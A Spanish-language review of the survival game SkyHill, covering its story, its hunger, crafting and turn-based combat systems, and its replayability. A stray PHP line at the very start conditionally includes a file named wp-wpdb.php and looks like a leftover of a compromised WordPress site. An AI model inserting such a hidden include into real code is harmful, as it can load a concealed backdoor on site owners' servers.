if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis SkyHill – La Fortaleza de LeChuck

Análisis SkyHill

Estamos acostumbrados a que Daedalic lance aventuras gráficas de gran calidad como Stasis, la cual analizamos hace unas semanas, pero en ocasiones nos sorprende con títulos tan curiosos y adictivos como Skyhill donde deberemos sobrevivir a través de las diferentes plantas de un hotel infestado de mutantes. ¿Lograrás llegar hasta la salida?

skyhill

Me hice con Skyhill sin saber apenas de él, animada por la editora que estaba detrás, así que esperaba encontrar un aventura gráfica point&click y me encontré con algo bastante distinto. Skyhill es un «Point n’Survive» en toda regla y así lo han etiquetado los desarrolladores de Mandragora. Su planteamiento es bien sencillo: recoger objetos y fabricar otros que nos ayuden a bajar de la planta 100 a la salida para escapar de los mutantes que han tomado el hotel. Pero, ¿cómo ha llegado nuestro protagonista allí?

La Tercera Guerra Mundial hizo estragos en el mundo, y las armas biológicas utilizadas han provocado la aparición de mutantes. Por asuntos de trabajo, estamos en la suite de la planta 100 pasando la noche pero de repente la alarma de ataque biológico salta en el hotel y recomiendan desde megafonía no salir de las habitaciones. Estamos muertos de hambre y decidimos arriesgarnos para buscar sustento e intentar escapar. A lo largo de nuestro descenso, daremos con paginas de recortes firmados por wikileaks que hablan de la situación mundial, audios con testimonios que narran sucesos estremecedores, televisores y ordenadores con datos extraños y otras sorpresas que serán fruto de nuestra exploración. Por suerte, tendremos la opción de resaltar objetos interaccionables.

skyhill-5
Mira, guapa, me pasé más de 100 horas en el yermo…

Skyhill es una aventura de scroll lateral que fusiona elementos de survival horror e incluye el tan recurrente modo de crafteo. Tendremos que enfrentarnos a enemigos y alimentarnos, ya que cada vez que recorremos distancias la barra de hambre de nuestro personaje disminuye, es decir, cada vez que avanzamos de una habitación a otra del hotel perdemos 1 punto de hambre y 2 de salud si tenemos la barra de hambre a 0. Para llenar ambas barras encontraremos por las habitaciones alimento y medicinas, pero para que sea más efectiva la recuperación tendremos que combinarlas entre sí y de esta manera crearemos nuevos objetos más potentes. ¿Granos de café y leche? Pues un buen cafelito para pasear entre mutantes. En nuestra habitación tenemos la mesa de cocina donde se puede mejorar para desbloquear nuevos alimentos que recuperarán más hambre. En cuanto a la barra de vida, si volvemos a nuestra habitación y echamos una siesta recuperaremos puntos de vida pero disminuirán los de hambre, y si no hemos mejorado nuestro dormitorio, pueden robarnos o entre sueños quizá destrocemos algo.

skyhill-3
¿Una consola y una TV? ¡Quién necesita salir de aquí!

En el caso de las armas, el crafteo funciona de forma similar. Por el hotel hallaremos armas básicas como cuchillos que disponen de poco nivel y que al comienzo nos pueden servir, pero a medida que nos acercamos a la salida nos aparecerán monstruos más terroríficos y necesitaremos algo mucho mayor, por lo tanto, será vital recopilar todo tipo de materiales para fabricar buenas armas y también para desbloquear los diferentes niveles de la mesa de fabricación, la cual está en nuestra habitación del piso 100 y allí deberemos acudir cada vez que deseemos fabricar armas. Pero tranquilos, no será necesario volver a patear todas las plantas cada vez que queramos subir a nuestra habitación, hay un ascensor que nos llevará hasta allí pero no podremos tomarlo en todas las plantas, ya que algunas tienen la puerta destrozada. El ascensor también será de gran importancia para evitar enfrentarnos a algunos monstruos que nos bloquean las escaleras o para acceder a una planta que tiene una maquina expendedora, siempre y cuando llevemos suelto, claro

skyhill-4

El modo de combate de Skyhill es por turnos pero muy sencillo y recuerda a lo ya visto en juegos como Quest for Glory. Cuando entramos en combate tendremos un modo simple que se trata de clickar sobre el enemigo y rezar para que el personaje no falle golpes o pulsar sobre el icono de la mirilla y centrar nuestro ataque en las zonas vitales y así hacer mas daño. Si nos decidimos por la opción mas compleja, nos aparecerá en pantalla el monstruo y sus zonas vitales en rojo con un tanto por cierto de probabilidad de daño. Una vez muerto el enemigo, se puede saquear su cuerpo para aumentar nuestro inventario y ganaremos puntos de experiencia que nos harán subir de nivel y así aumentar nuestros atributos. No siempre estamos obligados a luchar contra mutantes, y en ocasiones podremos dar media vuelta y largarnos, no nos seguirán. Por otro lado, hay bichos que bloquean caminos y nos veremos obligados a darles su merecido. ¿Y si no lo conseguimos? Pues Game Over, pero tranquilos, se os premiará desbloqueando nuevas habilidades pasivas que serán muy importantes para llegar hasta el final. Recomiendo la de abrir todas las puertas y la de maestro del saqueo.

skyhill-2
Disculpe señor, ¿tiene cambio para la máquina de tabaco?

Estamos ante un juego altamente rejugable y cada vez que empecemos de nuevo las habitaciones cambiarán de posición de forma aleatoria, igual que los monstruos y los objetos. Así que no sirve de mucho memorizar que en la planta X estaba aquel objeto tan molón. Lo que se mantendrán son los recortes, grabaciones encontradas y las habilidades pasivas desbloqueadas.

Skyhill es tan extremadamente sencillo como adictivo, y estuve obcecada unas buenas semanas hasta que conseguí pasármelo y tardé lo mío. Además, hay dos finales y dar con el más complicado demostrará vuestra pericia explorando. Sin duda, un juego muy recomendable que os espera en Steam.